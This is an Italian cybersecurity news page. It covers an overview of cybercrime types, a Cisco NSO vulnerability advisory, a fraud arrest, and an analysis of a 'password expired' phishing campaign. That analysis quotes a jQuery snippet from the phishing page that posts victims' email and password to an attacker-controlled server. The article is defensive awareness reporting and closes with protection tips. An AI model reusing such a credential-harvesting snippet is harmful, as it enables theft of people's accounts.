Connect with us

Sicurezza Informatica

Cybercrime: il crimine informatico nella Matrice Digitale

Tempo di lettura: 3 minuti. Il crimine informatico è un aspetto determinante nella Matrice Digitale dove viviamo: un sunto dell’attività redazione sul tema

Pubblicato

in data

Tempo di lettura: 3 minuti.

Il crimine informatico ha assunto molte forme nell’era digitale, influenzando ogni aspetto della nostra vita online. Da attacchi mirati a truffe economiche e violazioni della privacy, esploriamo le diverse sfaccettature di questa minaccia in crescita.

1. Crimine Informatico legato allo sviluppo di Malware e Attacchi

Il malware, o software dannoso, è progettato per infiltrarsi o danneggiare sistemi informatici senza il consenso dell’utente.

  • Virus: Programmi che si replicano e infettano altri software o file.
  • Worms: Simili ai virus, ma si diffondono autonomamente attraverso le reti.
  • Ransomware: Blocca l’accesso ai dati dell’utente e richiede un riscatto per il suo rilascio. Leggi tutte le notizie sul tema
  • Trojan: Si presenta come software legittimo, ma una volta installato, rilascia malware o consente l’accesso a cybercriminali. Leggi tutte le notizie sul tema

2. Truffe Economiche

Le truffe online sono diventate sempre più sofisticate, mirando a defraudare le vittime dei loro soldi.

E’ possibile approfondire meglio le dinamiche delle minacce “informatiche” consultando l’apposito approfondimento sulla cybersecurity.

3. Sfera Sessuale e Privata

Il crimine informatico può avere un profondo impatto emotivo, specialmente quando colpisce la sfera personale e privata delle vittime.

  • Cyberstalking: Perseguire o molestare una persona online. Leggi tutte le notizie di cyberstalking
  • Revenge porn: Distribuzione non autorizzata di immagini o video intimi. Leggi tutte le notizie di revenge porn
  • Sextortion: Estorsione basata sulla minaccia di divulgare materiale sessualmente esplicito. Leggi tutte le notizie di sextortion
  • Camfecting: Prendere il controllo di una webcam senza il consenso dell’utente.
  • Scam sentimentali: Truffatori che fingono interesse romantico per estorcere denaro.
  • Pedofilia online e CSAM: La pedofilia online si riferisce all’uso di internet per sfruttare sessualmente i minori. Ciò può includere la produzione, distribuzione e visione di materiale di abuso sessuale sui minori (CSAM). Leggi tutte le notizie di CSAM

Leggi tutte le notizie a sfondo sessuale

4. Commercio illegale

Il commercio illegale all’interno in rete avviene sia sui social network che all’interno del Dark Web. In rete è possibile trovare tutto, ma bisogna fare attenzione a non trovarsi truffati così come a non credere che sia possibile far tutto e farla franca. Ci sono Mercati Neri dove è possibile comprare armi, droghe e servizi illegali di hacking.

5. Terrorismo e hacktivismo

Seppur ci siano molte differenze dal promuovere finalità di natura sociale da quelle di natura terroristica, entrambe si macchiano di crimini informatici per far valere le proprie idee.

  • Hacktivismo: l’attivismo attraverso l’hacking è uno strumento che ha caratterizzato sia modelli apparentemente indipendenti come Anonymous e LulzSec sia bande al servizio del Cremlino in situazioni di guerra come Killnet e NoName057 intervistati in esclusiva da Matrice Digitale.
  • Terrorismo: il terrorismo online agisce facendo proseliti attraverso forum specializzati o app di messaggistica come Telegram, propaganda i propri messaggi sui social ordinari fino ad arrivare al lato oscuro della rete. Leggi le notizie pubblicate da Matrice Digitale sul terrorismo

6. Dark Web

Il dark web rappresenta una parte nascosta e inaccessibile del vasto universo di Internet, accessibile solo attraverso specifici software che garantiscono l’anonimato agli utenti. Questa caratteristica di riservatezza ha fatto sì che il dark web diventasse un terreno fertile per attività illecite. La criminalità informatica, in particolare, ha trovato nel dark web un luogo sicuro dove vendere e acquistare dati rubati, software malevoli, servizi di hacking e molto altro. Le transazioni avvengono spesso in criptovalute, come il Bitcoin, per garantire ulteriore anonimato. Le autorità di tutto il mondo stanno intensificando gli sforzi per monitorare e contrastare le attività illegali sul dark web, ma la sua natura decentralizzata e criptata rende questa battaglia particolarmente complessa, ma non impossibile. Leggi tutte le notizie di Matrice Digitale sul DarkWeb

Segnala una truffa o un reato alla redazione

Conclusione

Il crimine informatico rappresenta una minaccia multidimensionale che va ben oltre i semplici attacchi tecnici. Mentre la tecnologia continua a evolversi, è essenziale che individui e aziende siano consapevoli delle diverse forme di cybercrime e adottino misure preventive per proteggere se stessi e i loro dati. Matrice Digitale dedica molta attenzione alla criminalità informatica e agli strumenti impiegati dai criminali con la speranza di fornire la giusta prevenzione alle potenziali vittime.

Sicurezza Informatica

Vulnerabilità privilegi in Cisco Crosswork Network Services Orchestrator

Tempo di lettura: < 1 minuto. Cisco rilascia aggiornamenti software per correggere una vulnerabilità di escalation dei privilegi nel Cisco Crosswork Network Services Orchestrator

Pubblicato

in data

Cisco logo
Tempo di lettura: < 1 minuto.

Cisco ha rilasciato aggiornamenti software gratuiti che affrontano una vulnerabilità di escalation dei privilegi nel Cisco Crosswork Network Services Orchestrator (NSO). Questa vulnerabilità potrebbe consentire a un attaccante autenticato di eseguire comandi arbitrari con privilegi elevati su un sistema interessato.

Descrizione della Vulnerabilità

La vulnerabilità si trova nel modulo Tail-f HCC Function Pack di Cisco Crosswork NSO e riguarda versioni specifiche del software. Gli aggiornamenti software rilasciati correggono questa falla, prevenendo l’uso non autorizzato di comandi con privilegi elevati.

Versioni interessate e correzioni disponibili

Cisco consiglia agli utenti di aggiornare il software alle seguenti versioni fisse:

Release Cisco Crosswork NSOPrima Release Fissa Tail-f HCC Function Pack
5.0 e versioni successive5.0.5
6.0 e versioni successive6.0.2

Aggiornamenti e Supporto

I clienti con contratti di servizio che includono aggiornamenti software regolari possono ottenere le correzioni di sicurezza attraverso i canali di aggiornamento consueti. I clienti devono assicurarsi che i dispositivi da aggiornare abbiano memoria sufficiente e che le configurazioni hardware e software attuali siano supportate dalla nuova release.

Clienti senza Contratti di Servizio

I clienti che acquistano direttamente da Cisco ma non dispongono di un contratto di servizio e quelli che acquistano tramite venditori terzi ma non riescono a ottenere il software corretto attraverso il loro punto vendita, devono contattare il Cisco TAC. È consigliato avere a disposizione il numero di serie del prodotto e fornire l’URL di questo avviso come prova del diritto a un aggiornamento gratuito.

Informazioni aggiuntive

Per ulteriori informazioni sulla vulnerabilità e le soluzioni di aggiornamento, è possibile consultare la pagina degli avvisi di sicurezza di Cisco.

Prosegui la lettura

Sicurezza Informatica

La tua password è scaduta: nuova ondata di attacchi phishing

Tempo di lettura: 4 minuti. Il phishing è una tecnica utilizzata dai criminali informatici per ottenere informazioni personali, come password, numeri di carte di credito e dati finanziari, fingendosi di essere entità affidabili.

Pubblicato

in data

phishing
Tempo di lettura: 4 minuti.

Introduzione: Gli attacchi di phishing sono una minaccia sempre più diffusa nel mondo digitale. Con l’aumento dell’uso di Internet e delle comunicazioni via email, i cybercriminali trovano sempre nuovi modi per ingannare le persone e rubare informazioni sensibili. In questo articolo, esploreremo cos’è il phishing, come funziona e come puoi proteggerti da esso.

Cos’è il Phishing: Il phishing è una tecnica utilizzata dai criminali informatici per ottenere informazioni personali, come password, numeri di carte di credito e dati finanziari, fingendosi di essere entità affidabili. Questi truffatori inviano email o messaggi che sembrano provenire da aziende o istituzioni legittime, come banche, social network o siti di e-commerce, al fine di ingannare le vittime e convincerle a fornire le proprie informazioni.

Come Funziona il Phishing: Gli attacchi di phishing possono assumere diverse forme, ma generalmente seguono un processo simile:

  1. Email di Phishing: Il truffatore invia un’email che sembra provenire da un’azienda conosciuta, chiedendo alla vittima di fornire informazioni personali o di fare clic su un link fraudolento.
  2. Link Fraudolenti: Il messaggio di phishing contiene un link che porta a una pagina web contraffatta che sembra autentica. Questa pagina può chiedere di accedere al tuo account o di inserire informazioni sensibili.
  3. Raccolta di Dati: Una volta che la vittima fornisce le informazioni richieste, i truffatori le utilizzano per rubare denaro, identità o altre informazioni sensibili.

Un caso reale di attacco

Questo che segue è un esempio di email ricevuta in una mia casella di posta elettronica. Siccome sono il provider di me stesso è stato subito evidente che si trattasse di un tentativo di phishing:

Il messaggio è in inglese, ed è stato ricevuto da migliaia di utenti che sono stati avvisati del fatto che la loro password era scaduta e che se non si fosse seguito il link il loro account sarebbe stato sospeso.

Io ovviamente ho seguito il link, e la pagina che mi è comparsa è questa:

La prima cosa che possiamo notare è come viene generata una finta pagina di accesso alla email con il nome estratto dal dominio della vittima ed in alcuni casi anche l’icona presa dal sito.

Non è molto complicato generare una pagina del genere, tutte le informazioni sono contenute nell’indirizzo email del malcapitato.

Inserendo la propria password questa viene inviata al server dell’hacker ed archiviata.

Come hanno fatto a trovare la mia email?

Prima di procedere a questo attacco gli hacker fanno una scansione del web, cercando in tutti i siti, forum pubblici, profili social e raccolgono milioni di email.

Successivamente vengono inviate le email e si aspettano gli utenti che “abboccano”

Il sito che viene presentato ha questo indirizzo URL

La pagina è ospitata su un gateway IPFS di CloudFlare.

Cosa è un server IPFS?

Un IPFS gateway funge da intermediario tra la rete IPFS decentralizzata e il World Wide Web tradizionale, consentendo agli utenti di accedere ai contenuti IPFS tramite il web utilizzando URL standard. Ciò rende i contenuti IPFS accessibili a una più ampia base di utenti e facilita l’integrazione dei contenuti IPFS con le applicazioni web esistenti.

In pratica l’origine del contenuto non è facilmente rintracciabile perchè schermata dal gateway.

Analisi del codice della pagina di phishing

Analizzando il codice della pagina è possibile vedere dove vengono inviati i dati raccolti in maniera fraudolenta.

$.ajax({
        dataType: 'JSON',
        url: 'https://winnersolution.us/TWE/gen.php',
        type: 'POST',
        data:{
          email:email,
          password:password,
        },

Cosa abbiamo trovato nel server degli hacker?

Questo hacker (non molto esperto) ha appena iniziato la sua attività di attacco, ed evidentemente dopo aver raccolto le email dei malcapitati lascerà scadere il dominio è l’hosting e passerà ad una nuova fase di attacco.

Abbiamo rintracciato il server che ha inviato l’email

Nei file log del server di posta elettronica siamo riusciti a trovare l’indirizzo del server che ha originato il messaggio fraudolento.

Il server ed il dominio ( jpcompaniesinc.com ) appartengono ad una azienda che molto probabilmente è stata hackerata in precedenza, e la loro casella di posta utilizzata per inviare altri messaggi.

Come Proteggerti dal Phishing: Proteggerti dagli attacchi di phishing è essenziale per mantenere al sicuro le tue informazioni. Ecco alcuni consigli utili:

  1. Verifica l’Autenticità: Controlla attentamente l’indirizzo email del mittente e verifica se corrisponde all’azienda o all’istituzione che dice di essere.
  2. Attenzione ai Link: Non fare clic su link sospetti presenti nelle email. Se devi accedere a un sito web, digita direttamente l’URL nella barra degli indirizzi del tuo browser.
  3. Non Condividere Informazioni Sensibili: Mai fornire password, numeri di carte di credito o altri dati sensibili tramite email, soprattutto se richiesto in modo non sollecitato.
  4. Utilizza Soluzioni di Sicurezza: Installa e aggiorna regolarmente un buon software antivirus e antimalware sul tuo computer e dispositivo mobile.
  5. Sii Consapevole: Sviluppa una consapevolezza delle pratiche di sicurezza online e educa te stesso e i tuoi dipendenti o familiari su come riconoscere e evitare gli attacchi di phishing.
Prosegui la lettura

Sicurezza Informatica

Autorità Canadesi arrestano il “Crypto King” per frode da 30 milioni

Tempo di lettura: < 1 minuto. Le Autorità canadesi arrestano il “Crypto King” per una frode da 30 di dollari ecco i dettagli dell’arresto e le implicazioni

Pubblicato

in data

Tempo di lettura: < 1 minuto.

Le autorità canadesi hanno arrestato il sedicente “Crypto King” con l’accusa di frode per un ammontare di 30 milioni di dollari. Questo caso evidenzia i rischi associati agli investimenti in criptovalute e l’importanza di una regolamentazione più rigorosa nel settore.

Dettagli dell’arresto

Il “Crypto King” è stato accusato di aver orchestrato uno schema di frode che ha portato alla perdita di 30 milioni di dollari da parte degli investitori. Le indagini hanno rivelato che il sospetto utilizzava tattiche ingannevoli per attrarre investitori, promettendo rendimenti elevati attraverso investimenti in criptovalute.

Indagini e collaborazioni

L’inchiesta è stata condotta con la collaborazione di diverse agenzie investigative canadesi. Queste indagini hanno incluso la raccolta di prove, l’analisi di transazioni finanziarie e l’interrogazione di testimoni. Le autorità hanno sottolineato l’importanza della cooperazione internazionale per combattere le frodi nel settore delle criptovalute.

Implicazioni per gli investitori

Questo caso mette in luce i pericoli delle frodi legate alle criptovalute e l’importanza di fare ricerche approfondite prima di investire. Gli esperti consigliano di essere cauti e di consultare consulenti finanziari qualificati prima di effettuare investimenti in ICO, IEO o altre opportunità di investimento in criptovalute.

Regolamentazione del Settore

L’arresto del “Crypto King” potrebbe accelerare gli sforzi per una regolamentazione più rigorosa del settore delle criptovalute in Canada e a livello globale. Le autorità stanno considerando misure per proteggere meglio gli investitori e prevenire future frodi. La frode da 30 milioni di dollari orchestrata dal “Crypto King” sottolinea la necessità di una maggiore vigilanza nel settore delle criptovalute. Gli investitori devono essere consapevoli dei rischi e fare ricerche approfondite prima di impegnare i loro fondi in questo mercato volatile.

Prosegui la lettura

Facebook

CYBERSECURITY

quick assist quick assist
Sicurezza Informatica3 ore fa

Quick Assist di Microsoft sfruttato per ingegneria sociale

Tempo di lettura: 2 minuti. Storm-1811 sfrutta Quick Assist di Microsoft in attacchi ransomware tramite tecniche di ingegneria sociale. Scopri...

breachforums offline breachforums offline
Sicurezza Informatica22 ore fa

BreachForums è offline e sotto il controllo dell’FBI

Tempo di lettura: 2 minuti. Il noto portale di annunci legati al crimine informatico dove si vendono i dati trafugati...

Cisco Talos Cisco Talos
Sicurezza Informatica2 giorni fa

Talos e CISA collaborano contro minacce Cyber a ONG e attivisti

Tempo di lettura: 2 minuti. Talos e CISA collaborano per proteggere le organizzazioni della società civile da minacce cyber, promuovendo...

Unit 42 Unit 42
Sicurezza Informatica3 giorni fa

DNS Tunneling: per tracciare vittime di Phishing

Tempo di lettura: 2 minuti. Gli hacker utilizzano il tunneling DNS per scandagliare le reti e tracciare le vittime, sfruttando...

Synlab Italia rivendicazione di Black Basta Synlab Italia rivendicazione di Black Basta
Sicurezza Informatica3 giorni fa

Black Basta Ransomware è diventato un problema mondiale

Tempo di lettura: 2 minuti. Black Basta Ransomware ha colpito più di 500 entità in vari settori, sottolineando la crescente...

cy4gaTE cy4gaTE
Economia3 giorni fa

Cy4Gate: accordo da un milione con Innovery

Tempo di lettura: 2 minuti. Cy4Gate rafforza la sua presenza nel mercato con una nuova partnership strategica con Innovery e...

citrix citrix
Sicurezza Informatica4 giorni fa

Citrix “mitigate manualmente Bug del Client SSH PuTTY”

Tempo di lettura: < 1 minuto. Citrix avverte gli amministratori di mitigare manualmente un bug nel client SSH PuTTY che...

Cyber Security6 giorni fa

Google ripara la quinta Vulnerabilità Zero-Day di Chrome nel 2024

Tempo di lettura: 2 minuti. Google ha rilasciato un aggiornamento per Chrome, correggendo la vulnerabilità zero-day CVE-2024-4671, marcata come attivamente...

Dell Dell
Sicurezza Informatica7 giorni fa

Disastro Dell: violazione dati di 49 Milioni di clienti

Tempo di lettura: 2 minuti. Dell annuncia una violazione dei dati che ha esposto nomi e indirizzi di 49 milioni...

Sicurezza Informatica1 settimana fa

Nuovo attacco “Pathfinder” alle CPU Intel: è il nuovo Spectre?

Tempo di lettura: 2 minuti. Pathfinder mira ai CPU Intel, in grado di recuperare chiavi di crittografia e perdere dati...

Truffe recenti

Sicurezza Informatica1 settimana fa

BogusBazaar falsi e-commerce usati per una truffa da 50 milioni

Tempo di lettura: 2 minuti. Oltre 850,000 persone sono state ingannate da una rete di 75,000 falsi negozi online, con...

Sicurezza Informatica1 settimana fa

Truffatori austriaci scappano dagli investitori, ma non dalla legge

Tempo di lettura: 2 minuti. Le forze dell'ordine hanno smascherato e arrestato un gruppo di truffatori austriaci dietro una frode...

Shein Shein
Truffe online1 mese fa

Truffa dei buoni SHEIN da 300 euro, scopri come proteggerti

Tempo di lettura: < 1 minuto. La truffa dei buoni SHEIN da 300 euro sta facendo nuovamente vittime in Italia,...

OSINT2 mesi fa

USA interviene per recuperare 2,3 Milioni dai “Pig Butchers” su Binance

Tempo di lettura: 2 minuti. Il Dipartimento di Giustizia degli USA interviene per recuperare 2,3 milioni di dollari in criptovalute...

dimarcoutletfirenze sito truffa dimarcoutletfirenze sito truffa
Inchieste3 mesi fa

Truffa dimarcoutletfirenze.com: merce contraffatta e diversi dalle prenotazioni

Tempo di lettura: 2 minuti. La segnalazione alla redazione di dimarcoutletfirenze.com si è rivelata puntuale perchè dalle analisi svolte è...

sec etf bitcoin sec etf bitcoin
Economia4 mesi fa

No, la SEC non ha approvato ETF del Bitcoin. Ecco perchè

Tempo di lettura: 3 minuti. Il mondo delle criptovalute ha recentemente assistito a un evento senza precedenti: l’account Twitter ufficiale...

Sicurezza Informatica5 mesi fa

Europol mostra gli schemi di fronde online nel suo rapporto

Tempo di lettura: 2 minuti. Europol’s spotlight report on online fraud evidenzia che i sistemi di frode online rappresentano una grave...

Sicurezza Informatica6 mesi fa

Polizia Postale: attenzione alla truffa dei biglietti ferroviari falsi

Tempo di lettura: < 1 minuto. Gli investigatori della Polizia Postale hanno recentemente individuato una nuova truffa online che prende...

app ledger falsa app ledger falsa
Sicurezza Informatica6 mesi fa

App Falsa di Ledger Ruba Criptovalute

Tempo di lettura: 2 minuti. Un'app Ledger Live falsa nel Microsoft Store ha rubato 768.000 dollari in criptovalute, sollevando dubbi...

keepass pubblicità malevola keepass pubblicità malevola
Sicurezza Informatica7 mesi fa

Google: pubblicità malevole che indirizzano a falso sito di Keepass

Tempo di lettura: 2 minuti. Google ospita una pubblicità malevola che indirizza gli utenti a un falso sito di Keepass,...

Tech

Zhibin Zhang Zhibin Zhang
Robotica1 ora fa

Il tatto dei Robot potrebbe essere veloce quanto quello umano

Tempo di lettura: < 1 minuto. Un sistema tattile artificiale sviluppato dall'Università di Uppsala permette ai robot di percepire il...

PipeWire 1.0 PipeWire 1.0
Tech2 ore fa

PipeWire 1.2 release candidate: novità e miglioramenti

Tempo di lettura: < 1 minuto. PipeWire 1.2 introduce la sincronizzazione esplicita e il supporto Snap, migliorando la gestione dei...

Smartphone2 ore fa

Samsung Galaxy S25 Ultra: Quattro fotocamere in Arrivo

Tempo di lettura: < 1 minuto. Il Galaxy S25 Ultra di Samsung potrebbe avere quattro fotocamere, inclusi aggiornamenti significativi, secondo...

Vivo S18 Vivo S18
Smartphone2 ore fa

Vivo S19 e S19 Pro: avranno grandi batterie?

Tempo di lettura: < 1 minuto. Le specifiche dei Vivo S19 e S19 Pro rivelano grandi batterie con ricarica a...

Tech2 ore fa

iPad Pro test di resistenza della flessione è superato

Tempo di lettura: 2 minuti. Il nuovo iPad Pro 2024 resiste ai test di flessione estrema, superando le versioni precedenti...

Tech4 ore fa

Caviar iPad Pro 2024 Criss-Cross il lusso firmato Deadpool

Tempo di lettura: 2 minuti. Caviar annuncia l'edizione limitata Criss-Cross iPad Pro 2024, ispirata a Deadpool e Wolverine, con oro...

Galaxy S24 FE Galaxy S24 FE
Smartphone4 ore fa

Samsung Galaxy S24 FE: in arrivo con prima Build di test di One UI

Tempo di lettura: < 1 minuto. Samsung Galaxy S24 FE in arrivo con la prima build di test di One...

Robot autonomi con cervelli AI animali Robot autonomi con cervelli AI animali
Robotica5 ore fa

Robot autonomi con cervelli AI animali

Tempo di lettura: 2 minuti. Scopri come l'intelligenza artificiale ispirata al cervello animale sta rivoluzionando i droni autonomi, rendendoli più...

Android 15 logo Android 15 logo
Tech6 ore fa

Android 15 Beta ecco i telefoni di terze parti dove si può installare

Tempo di lettura: < 1 minuto. La beta di Android 15 è ora disponibile su dispositivi di terze parti come...

Tech6 ore fa

Controlla il tuo iPhone o iPad con gli occhi

Tempo di lettura: < 1 minuto. Apple introduce il tracciamento oculare su iPhone e iPad con iOS 18, insieme a...

Tendenza